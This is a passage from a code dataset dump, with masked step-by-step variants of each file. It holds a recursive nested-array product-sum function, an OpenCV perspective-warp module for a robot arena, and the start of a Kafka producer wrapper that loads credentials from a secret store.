code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
"""
- input: is a 'special' array (heavily nested array)
- output: return the product sum
- notes:
- special array is a non-empty array that contains either integers or other 'special' arrays
	- product sum of a special array is the sum of its elements, where 'special' arrays inside are summed themselves and then multiplied by their level of depth
- logic:
- need two variables the sum and the depth; the depth will be passed on from function call to function call
- we iterate through the 'special' array
- check if it is a type int
- add to the sum
- else the element we are currently on is a 'special' array
- add to the sum the return value of recursively calling the function passing in the element and the current depth + 1
- return sum
"""
def product_sum(array):
    """Return the product sum of *array*.

    A 'special' array is a non-empty list containing integers or other
    special arrays.  Its product sum is the sum of its elements, where each
    nested special array is summed recursively and that partial sum is
    multiplied by its nesting depth (top level = depth 1).
    """
    def _product_sum_rec(elements, depth):
        # Sum ints directly; recurse into nested arrays with depth + 1,
        # then weight the whole level by its depth.
        total = 0
        for element in elements:
            if isinstance(element, int):
                total += element
            else:
                total += _product_sum_rec(element, depth + 1)
        return depth * total

    return _product_sum_rec(array, 1)
def product_sum_helper(array, depth):
    """Return the depth-weighted sum of *array*.

    Integers are added directly; nested lists are summed recursively at
    depth + 1.  The level's total is multiplied by *depth* before returning.
    (Renamed the accumulator so it no longer shadows the builtin ``sum``,
    and switched to ``isinstance`` for the type test.)
    """
    total = 0
    for element in array:
        if isinstance(element, int):
            total += element
        else:
            total += product_sum_helper(element, depth + 1)
    return depth * total
# Time Complexity: O(n), where n is the number of nodes in the element
# Space Complexity: O(d), where d is the greatest depth of the 'special' arrays in the array
|
normal
|
{
"blob_id": "87e5a615157db59d1eac4967c321829c878d00a5",
"index": 2234,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef product_sum_helper(array, depth):\n sum = 0\n for ele in array:\n if type(ele) is int:\n sum += ele\n else:\n sum += product_sum_helper(ele, depth + 1)\n return depth * sum\n",
"step-3": "<mask token>\n\n\ndef product_sum(array):\n sum = 0\n depth = 1\n sum += product_sum_helper(array, depth)\n return sum\n\n\ndef product_sum_helper(array, depth):\n sum = 0\n for ele in array:\n if type(ele) is int:\n sum += ele\n else:\n sum += product_sum_helper(ele, depth + 1)\n return depth * sum\n",
"step-4": "\"\"\"\n- input: is a 'special' array (heavily nested array)\n- output: return the product sum\n- notes:\n - special array is a non-empty array that contains either integers or other 'special' arrays\n - product sum of a special array is the sum of its elements, where 'special' arrays inside are summed themselves and then multipled by their level of depth\n- logic:\n - need two variables the sum and the depth; the depth will be passed on from function call to function call\n - we iterate through the 'special' array\n - check if it is a type int\n - add to the sum\n - else the element we are currently on is a 'special' array\n - add to the sum the return value of recursively calling the function passing in the element and the current depth + 1\n - return sum\n\"\"\"\n\n\ndef product_sum(array):\n sum = 0\n depth = 1\n sum += product_sum_helper(array, depth)\n return sum\n\n\ndef product_sum_helper(array, depth):\n sum = 0\n\n for ele in array:\n if type(ele) is int:\n sum += ele\n else:\n sum += product_sum_helper(ele, depth + 1)\n\n return depth * sum\n\n\n# Time Complexity: O(n), where n is the number of nodes in the element\n# Space Complexity: O(d), where d is the greatest depth of the 'special' arrays in the array\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""
* Team Id : LM#4787
* Author List : Arjun S, Vinod, Arvind, Vishnu
* Filename: ArenaPreprocessor.py
* Theme: Launch A Module
* Functions: arena_preprocess, getTransformationMatrix, get_robot_space
* Global Variables: None
"""
import cv2
import numpy as np
"""
* Function Name: getTransformationMatrix
* Input: frame - (raw camera feed of the arena)
* Output: perspective transformation matrix
* Logic: Uses image processing techniques and finds contours for outer border to
get transformation matrix
Each process is explained in the function
* Example Call: M = getTransformationMatrix(frame)
"""
def getTransformationMatrix(frame):
    """Compute the perspective transform mapping the arena border to a 900x600 view.

    Isolates the arena's thick black border via denoise/threshold/morphology,
    takes the two largest contours as the border's outer and inner edges,
    averages their quadrilateral corners to get the border centerline, and
    returns the matrix from cv2.getPerspectiveTransform.
    Returns None when the border corners cannot be detected reliably.
    """
    # Denoising: bilateral filter (preferred over medianBlur to keep edge info).
    processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
    # To grayscale.
    processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
    # Increase contrast: for better border detection.
    processed_arena = cv2.equalizeHist(processed_arena)
    # Adaptive threshold to get the black thick boundary (robust to lighting).
    processed_arena = cv2.adaptiveThreshold(processed_arena, 255,
                                            cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,
                                            31, 5)
    # Morphological operations: erode then dilate to remove speckle noise.
    processed_arena = cv2.erode(processed_arena, np.ones((7, 7), np.uint8))
    processed_arena = cv2.dilate(processed_arena, np.ones((5, 5), np.uint8))
    # Contour detection.
    # NOTE(review): cv2.findContours returns 3 values on OpenCV 3.x and 2 on
    # 2.x/4.x; this unpacking assumes a 2-value version — confirm against the
    # deployed OpenCV.
    (contours, hierarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
    # The border's outer and inner edges are the two largest contours.
    contours = sorted(contours, key=cv2.contourArea, reverse=True)
    if len(contours) < 2:
        # Border not detected at all (e.g. camera obstructed).
        return
    the_outer_contour = contours[0]
    the_inner_contour = contours[1]
    # Approximate each contour with a polygon to get quadrilateral corners.
    peri_in = cv2.arcLength(the_inner_contour, True)
    peri_out = cv2.arcLength(the_outer_contour, True)
    in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)
    out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)
    # BUG FIX: the averaging below requires BOTH polygons to be quadrilaterals,
    # so bail out if EITHER is not 4 points.  The original used `and`, which
    # let mismatched shapes through and crashed on `in_corners + out_corners`.
    if len(in_corners) != 4 or len(out_corners) != 4:
        return
    # Define result dimensions (600 X 900) therefore each block 100 X 100.
    result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])
    # Sort the detected corners by x+y so they align with result corner order.
    in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]
    out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]
    # Corner blocks are less than 8 inches: block + center of border = 8in,
    # so take the midpoint between inner and outer border corners.
    corners = (in_corners + out_corners) / 2
    source_pts = np.float32(corners)
    # Get transformation matrix.
    M = cv2.getPerspectiveTransform(source_pts, result_pts)
    return M
"""
* Function Name: arena_preprocess
* Input: image - (raw camera feed of the arena)
* Output: processed_arena, warped_arena
* Logic: Multiple openCV tricks are used to make the raw camera feed
as close to ideal image as possible
Each process is explained in the function
* Example Call: arena_preprocess(frame, M)
"""
def arena_preprocess(frame, M):
    """Warp the raw arena frame into the canonical 900x600 view and clean it up.

    Returns a tuple (processed_arena, warped_arena):
      - processed_arena: whitened, denoised image with grid lines, used for
        object detection
      - warped_arena: plain warped image, used for robot tracking
    """
    # Map the raw frame onto the 900x600 result plane.
    arena = cv2.warpPerspective(frame, M, (900, 600))

    # Whiten the excess black border (~10px thick): flood-fill outward from
    # the top-left corner, bounded by the inner quadrilateral drawn on the
    # barrier mask, then add the white region onto the image.
    border_quad = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
    height, width = arena.shape[:2]
    fill_result = np.zeros((height, width), np.uint8)
    fill_barrier = np.zeros((height + 2, width + 2), np.uint8)
    cv2.drawContours(fill_barrier, [border_quad], -1, 255, 1)
    cv2.floodFill(fill_result, fill_barrier, (0, 0), 255)
    arena = cv2.add(arena, cv2.cvtColor(fill_result, cv2.COLOR_GRAY2BGR))

    # Keep an untouched copy for robot tracking before further processing.
    warped_arena = arena.copy()

    # Edge-preserving denoise.
    arena = cv2.bilateralFilter(arena, 5, 99, 198)

    # Make the background white: invert, subtract the original, invert back.
    inverted = cv2.bitwise_not(arena)
    arena = cv2.bitwise_not(cv2.subtract(inverted, arena))

    # Overlay the 100x100 grid lines.
    for row in range(0, 6):
        for col in range(0, 9):
            cv2.line(arena, (col * 100, row * 100), (col * 100, (row + 1) * 100), (0, 0, 0), 1)
        cv2.line(arena, (0, row * 100), (900, row * 100), (0, 0, 0), 1)

    # arena: for object detection; warped_arena: for robot tracking.
    return arena, warped_arena
"""
* Function Name: get_robot_space
* Input: frame - (raw camera feed of the arena)
* Output: warped portion of arena
* Logic: Warps a portion of the arena to which the robot position
is mapped to avoid parallax
* Example Call: robot_space = get_robot_space(frame)
"""
def get_robot_space(frame):
    """Warp the robot-tracking portion of the arena to a 900x600 grid view.

    Uses fixed, hand-calibrated source points so the robot position is mapped
    onto the grid without parallax error.
    """
    # Edge-preserving denoise of the raw feed (bilateral keeps edge info).
    smoothed = cv2.bilateralFilter(frame, 5, 99, 198)

    # Hand-calibrated corners of the robot plane in the camera image.
    source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])
    # Target corners: 900x600 result, so each grid block is 100x100.
    result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])

    # Build the transform and remap onto the result plane.
    transform = cv2.getPerspectiveTransform(source_pts, result_pts)
    warped_arena = cv2.warpPerspective(smoothed, transform, (900, 600))

    # Overlay the 100x100 grid lines.
    for row in range(0, 6):
        for col in range(0, 9):
            cv2.line(warped_arena, (col * 100, row * 100), (col * 100, (row + 1) * 100), (0, 0, 0), 1)
        cv2.line(warped_arena, (0, row * 100), (900, row * 100), (0, 0, 0), 1)

    return warped_arena
|
normal
|
{
"blob_id": "228852f960e9343d9f45abdd3204cfab7bb54bc6",
"index": 8230,
"step-1": "<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n 
warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n 
warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-4": "<mask token>\nimport cv2\nimport numpy as np\n<mask token>\n\n\ndef getTransformationMatrix(frame):\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n processed_arena = cv2.equalizeHist(processed_arena)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.\n ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, 0.01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, 0.01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, \n 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners\n [:, 0, 1])]\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n return M\n\n\n<mask token>\n\n\ndef arena_preprocess(frame, M):\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 255)\n processed_arena = cv2.add(processed_arena, 
cv2.cvtColor(result_mask,\n cv2.COLOR_GRAY2BGR))\n warped_arena = processed_arena.copy()\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n arena_inv = cv2.bitwise_not(processed_arena)\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n processed_arena = cv2.bitwise_not(processed_arena)\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *\n 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return processed_arena, warped_arena\n\n\n<mask token>\n\n\ndef get_robot_space(frame):\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]])\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * \n 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n return warped_arena\n",
"step-5": "\"\"\"\n* Team Id : LM#4787\n* Author List : Arjun S, Vinod, Arvind, Vishnu\n* Filename: ArenaPreprocessor.py\n* Theme: Launch A Module\n* Functions: arena_preprocess, getTransformationMatrix, get_robot_space\n* Global Variables: None\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n\n\"\"\"\n* Function Name: getTransformationMatrix\n* Input: frame - (raw camera feed of the arena)\n* Output: perspective transformation matrix\n* Logic: Uses image processing techniques and finds contours for outer border to\n get transformation matrix\n Each process is explained in the function\n* Example Call: M = getTransformationMatrix(frame)\n\"\"\"\n\ndef getTransformationMatrix(frame):\n # # flips Horizontally and Vertically: Depends on Camera Setup\n # arena = cv2.flip(frame, -1)\n\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # To Grayscale\n processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n\n # Increase Contrast: for better border detection\n processed_arena = cv2.equalizeHist(processed_arena)\n\n # Adaptive Threshold to get black thick boundary: (Used over Threshold: for lighting consideration1)\n processed_arena = cv2.adaptiveThreshold(processed_arena, 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV,\n 31, 5)\n\n # Morphological Operations: to remove noise\n kernel = np.ones((7, 7), np.uint8)\n processed_arena = cv2.erode(processed_arena, kernel)\n\n kernel = np.ones((5, 5), np.uint8)\n processed_arena = cv2.dilate(processed_arena, kernel)\n\n # Contour Detection\n (contours, heirarchy) = cv2.findContours(processed_arena, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n # Getting the contour of interest: inner edge and outer edge of the box- largest and second largest contour\n contours = sorted(contours, key=cv2.contourArea, reverse=True)\n the_outer_contour = contours[0]\n the_inner_contour = contours[1]\n\n # 
Approximating to get corners of the quadrilaterals\n peri_in = cv2.arcLength(the_inner_contour, True)\n peri_out = cv2.arcLength(the_outer_contour, True)\n in_corners = cv2.approxPolyDP(the_inner_contour, .01 * peri_in, True)\n out_corners = cv2.approxPolyDP(the_outer_contour, .01 * peri_out, True)\n if len(in_corners) != 4 and len(out_corners) != 4:\n return\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Sort the detected corners to align with result corners\n in_corners = in_corners[np.argsort(in_corners[:, 0, 0] + in_corners[:, 0, 1])]\n out_corners = out_corners[np.argsort(out_corners[:, 0, 0] + out_corners[:, 0, 1])]\n\n # corner blocks are less than 8 inches: block + center of border = 8in\n corners = (in_corners + out_corners) / 2\n source_pts = np.float32(corners)\n\n # cv2.drawContours(frame, [corners], -1, (255, 0, 0), 2)\n # cv2.imshow('Display'. frame)\n # cv2.waitKey(0)\n # For Debugging: cv2.drawContours(arena, corners, -1, (0, 0, 255), 5)\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n return M\n\n\n\"\"\"\n* Function Name: arena_preprocess\n* Input: image - (raw camera feed of the arena)\n* Output: processed_arena, warped_arena\n* Logic: Multiple openCV tricks are used to make the raw camera feed\n as close to ideal image as possible\n Each process is explained in the function\n* Example Call: arena_preprocess(frame, M)\n\"\"\"\n\ndef arena_preprocess(frame, M):\n # Remapping to final desired result image\n processed_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Make the excess black border White: ~10px thick\n in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])\n h, w = processed_arena.shape[:2]\n result_mask = np.zeros((h, w), np.uint8)\n mask = np.zeros((h + 2, w + 2), np.uint8)\n cv2.drawContours(mask, [in_corners], -1, 255, 1)\n cv2.floodFill(result_mask, mask, (0, 0), 
255)\n processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask, cv2.COLOR_GRAY2BGR))\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n warped_arena = processed_arena.copy();\n # Warped_arena: to be used for robot tracking\n # Denoising: bilateral filter\n processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)\n\n # To Make Background White:\n # 1) Invert\n arena_inv = cv2.bitwise_not(processed_arena)\n # 2) Subtract\n processed_arena = cv2.subtract(arena_inv, processed_arena)\n # 3) Invert\n processed_arena = cv2.bitwise_not(processed_arena)\n\n # # Color Enhancement: Does Not Help in color detection\n # ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)\n # y, cr, cb = cv2.split(ycrcb)\n # cv2.equalizeHist(y, y)\n # ycrcb = cv2.merge((y, cr, cb))\n # processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)\n #\n # # Shadow Removal- Not Used since Removes Shape Detail\n # shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n # ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)\n # shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)\n # processed_arena = cv2.add(processed_arena, shadow)\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # processed_arena: to be used for Object Detection\n return processed_arena, warped_arena\n\n\n\"\"\"\n* Function Name: get_robot_space\n* Input: frame - (raw camera feed of the arena)\n* Output: warped portion of arena\n* Logic: Warps a portion of the arena to which the robot position\n is mapped to avoid parallax\n* Example Call: robot_space = get_robot_space(frame)\n\"\"\"\n\n\ndef get_robot_space(frame):\n # Denoising: 
bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]]) #(576, 65) # 53,71 (53, 400) (586, 390)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, result_pts)\n\n # Remapping to final desired result image\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n\n return warped_arena\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class Producer:
    """Thin wrapper around KafkaProducer, configured from environment variables.

    Expects KAFKA_USERNAME, KAFKA_PASSWORD and KAFKA_HOSTS to be set
    (see set_creds) and a CA certificate at /opt/scripts/ca-cert.cer.
    """

    def __init__(self, topic):
        self.topic_name = topic
        producer_config = {
            'bootstrap_servers': os.environ['KAFKA_HOSTS'],
            'acks': 1,
            'compression_type': 'snappy',
            'retries': 5,
            'linger_ms': 200,
            'batch_size': 1000,
            'request_timeout_ms': 100000,
            'sasl_plain_username': os.environ['KAFKA_USERNAME'],
            'sasl_plain_password': os.environ['KAFKA_PASSWORD'],
            'security_protocol': 'SASL_SSL',
            'sasl_mechanism': 'PLAIN',
            'ssl_cafile': '/opt/scripts/ca-cert.cer',
            'api_version': (0, 10, 1),
        }
        self.producer = KafkaProducer(**producer_config)

    def produce_message(self, message):
        # Asynchronous send; delivery is forced by flush() in close().
        self.producer.send(self.topic_name, message)

    def close(self):
        # Flush pending batches before closing the client.
        self.producer.flush()
        self.producer.close()
        logger.info('closed')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Producer:
    """Thin wrapper around KafkaProducer, configured from environment variables.

    Expects KAFKA_USERNAME, KAFKA_PASSWORD and KAFKA_HOSTS to be set
    (see set_creds) and a CA certificate at /opt/scripts/ca-cert.cer.
    """

    def __init__(self, topic):
        self.topic_name = topic
        producer_config = {
            'bootstrap_servers': os.environ['KAFKA_HOSTS'],
            'acks': 1,
            'compression_type': 'snappy',
            'retries': 5,
            'linger_ms': 200,
            'batch_size': 1000,
            'request_timeout_ms': 100000,
            'sasl_plain_username': os.environ['KAFKA_USERNAME'],
            'sasl_plain_password': os.environ['KAFKA_PASSWORD'],
            'security_protocol': 'SASL_SSL',
            'sasl_mechanism': 'PLAIN',
            'ssl_cafile': '/opt/scripts/ca-cert.cer',
            'api_version': (0, 10, 1),
        }
        self.producer = KafkaProducer(**producer_config)

    def produce_message(self, message):
        # Asynchronous send; delivery is forced by flush() in close().
        self.producer.send(self.topic_name, message)

    def close(self):
        # Flush pending batches before closing the client.
        self.producer.flush()
        self.producer.close()
        logger.info('closed')
def set_creds():
    """Fetch Kafka credentials from the secret store and export them as env vars.

    Populates KAFKA_USERNAME, KAFKA_PASSWORD and KAFKA_HOSTS, which the
    Producer class reads on construction.
    """
    secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',
        'password', 'kafka_hosts'])
    for env_name, secret_key in (('KAFKA_USERNAME', 'username'),
                                 ('KAFKA_PASSWORD', 'password'),
                                 ('KAFKA_HOSTS', 'kafka_hosts')):
        os.environ[env_name] = secrets[secret_key]
def run_kafka_producer_job(logs, topic_name):
    """Serialize each record in *logs* as JSON and publish it to *topic_name*.

    Credentials are refreshed via set_creds() before the producer is built.
    The producer is always closed (flushing pending messages), and any
